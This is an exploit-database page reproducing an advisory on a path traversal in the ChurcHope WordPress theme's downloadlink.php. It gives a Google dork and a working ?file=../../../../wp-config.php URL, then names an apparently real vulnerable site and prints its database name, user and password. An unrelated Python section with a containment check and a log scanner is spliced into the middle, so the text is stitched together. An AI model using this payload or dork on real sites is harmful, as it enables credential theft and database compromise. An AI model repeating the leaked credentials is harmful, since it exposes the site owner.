WordPress 4.7.13 ChurcHope Responsive Themes 4.7.x Database Configuration File Download

CVE: N/A
Category: CWE-16
Price: Not specified
Severity: High
Author: Not specified
Risk: High
Exploitation Type: Remote
Date: 2019-03-21
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030179

Below is a copy:

WordPress 4.7.13 ChurcHope Responsive Themes 4.7.x Database Configuration File Download
############################################################################################

# Exploit Title : WordPress 4.7.13 ChurcHope Responsive Themes 4.7.x Database Configuration File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/03/2019
# Vendor Homepage : themeforest.net
# Software Information Link : themeforest.net/item/churchope-responsive-wordpress-theme/2708562
# Software Affected Versions : WordPress 4.x - 4.7.13 - Software 4.7.x
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/wp-content/themes/churchope/
# Vulnerability Type : 
CWE-16 [ Configuration ]
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

############################################################################################

# Impact :
***********
* WordPress 4.x ChurcHope Responsive Themes 4.7.x is prone to a vulnerability that lets attackers download the database configuration file because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the web server process and obtain potentially sensitive information.

* An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.

* The software has a Relative Path Traversal vulnerability: it uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location outside of that directory.

############################################################################################

# Vulnerable File :
****************
/downloadlink.php

# Vulnerable Parameter :
**********************
?file=

# Database Configuration File Download Exploit :
********************************************
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php

Information About MySQL Database Configuration File =>
****************************************************
/** The name of the database for WordPress */
define('DB_NAME', '');

/** MySQL database username */
define('DB_USER', '');

/** MySQL database password */
define('DB_PASSWORD', '');

/** MySQL hostname */
define('DB_HOST', '');
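The weakness described above is a containment failure: a user-supplied file= value is joined onto a directory and served without checking that the resolved path stays inside that directory. The following Python is added here as an example and is not code from the advisory or from the ChurcHope theme (the theme's own downloadlink.php is not reproduced on this page). It shows the containment check such an endpoint needs, and a scan over web-server access-log lines that flags traversal attempts against downloadlink.php, including percent-encoded and double-encoded variants. The function names, the base directory and the log lines are constructed assumptions for illustration.

```python
"""Containment check and access-log detection for the downloadlink.php
?file= traversal described in this advisory.

Added example, not code from the advisory or the ChurcHope theme.  The
function names, the base directory and the log lines are constructed for
illustration; the theme's own downloadlink.php is not reproduced here.
"""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint named in the advisory; used to narrow the log scan.
DOWNLOAD_ENDPOINT = "/wp-content/themes/churchope/lib/downloadlink.php"


def safe_resolve(base_dir, requested):
    """Return the path to serve, or None if `requested` escapes base_dir.

    This is the check the advisory says is missing: decode the user value
    (twice, so a double-encoded %252e%252e%252f is not waved through),
    reject NUL bytes, normalise away "." and ".." segments, then require
    the result to stay inside base_dir.  A production version should also
    call os.path.realpath() so symlinks cannot point outside the base.
    """
    decoded = unquote(unquote(requested))
    if "\x00" in decoded:
        return None
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, decoded.lstrip("/")))
    if candidate != base and not candidate.startswith(base + "/"):
        return None  # normalised path left the download directory
    return candidate


# Common log format: ip ident user [time] "METHOD target proto" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)
TRAVERSAL = re.compile(r"\.\.[/\\]")


def scan_access_log(lines):
    """Flag requests to the download endpoint whose file= value contains a
    traversal sequence after decoding.  Returns one dict per suspicious hit."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a log line in the expected format
        parts = urlsplit(m.group("target"))
        if parts.path != DOWNLOAD_ENDPOINT:
            continue
        # parse_qs already percent-decodes once; unquote again for double encoding
        for value in parse_qs(parts.query).get("file", []):
            decoded = unquote(value)
            if TRAVERSAL.search(decoded):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "file": decoded,
                    "status": int(m.group("status")),
                })
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Mar/2019:10:15:02 +0000] "GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 200 3120',
    '203.0.113.5 - - [21/Mar/2019:10:15:09 +0000] "GET /wp-content/themes/churchope/lib/downloadlink.php?file=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 3120',
    '203.0.113.5 - - [21/Mar/2019:10:15:15 +0000] "GET /wp-content/themes/churchope/lib/downloadlink.php?file=%252e%252e%252fwp-config.php HTTP/1.1" 200 3120',
    '198.51.100.7 - - [21/Mar/2019:10:16:30 +0000] "GET /wp-content/themes/churchope/lib/downloadlink.php?file=sermon-notes.pdf HTTP/1.1" 200 48211',
    '198.51.100.9 - - [21/Mar/2019:10:17:01 +0000] "GET /wp-content/uploads/2019/03/bulletin.pdf HTTP/1.1" 200 9001',
]


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['time']} file={hit['file']} status={hit['status']}")
    print(safe_resolve("/var/www/downloads", "../../../../wp-config.php"))  # None
```

Two points worth noting for anyone adapting this: the scan flags the request regardless of HTTP status, because a 200 on a traversal request is the signal that the file was actually served, while a 404 still shows reconnaissance; and safe_resolve decodes before normalising, since normalising first would leave an encoded "%2e%2e/" intact and let it be decoded later by the file layer.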

############################################################################################

# Example Vulnerable Sites :
*************************
[+] alexanderfaranpojo.com/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php

/** The name of the database for WordPress */
define('DB_NAME', 'alexand3_wpAFM');

/** MySQL database username */
define('DB_USER', 'alexand3_wpAFM');

/** MySQL database password */
define('DB_PASSWORD', 'c8Se4dP7fr');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** 

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

############################################################################################

Copyright ©2024 Exploitalert.